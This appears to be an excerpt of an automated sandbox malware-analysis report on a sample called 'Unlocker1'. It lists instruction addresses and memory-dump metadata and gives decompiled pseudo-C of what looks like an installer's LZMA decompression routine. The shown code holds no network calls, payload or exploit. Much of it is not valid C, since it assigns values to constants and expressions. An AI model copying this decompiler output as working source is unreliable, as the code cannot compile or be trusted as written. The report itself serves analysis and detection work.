                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x0040682e
                                                                                                                                                              0x00406834
                                                                                                                                                              0x00406836
                                                                                                                                                              0x0040683d
                                                                                                                                                              0x0040683f
                                                                                                                                                              0x00406846
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671c
                                                                                                                                                              0x0040671f
                                                                                                                                                              0x00406722
                                                                                                                                                              0x00406725
                                                                                                                                                              0x00406728
                                                                                                                                                              0x0040672b
                                                                                                                                                              0x0040672e
                                                                                                                                                              0x00406731
                                                                                                                                                              0x00406737
                                                                                                                                                              0x00406750
                                                                                                                                                              0x00406753
                                                                                                                                                              0x00406756
                                                                                                                                                              0x00406759
                                                                                                                                                              0x0040675d
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x00406760
                                                                                                                                                              0x00406763
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406741
                                                                                                                                                              0x00406746
                                                                                                                                                              0x00406748
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065e2

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                                                              • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                                                                                                                                              • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                                                                                                                                              • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004062F4 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004062F4() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040684B))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
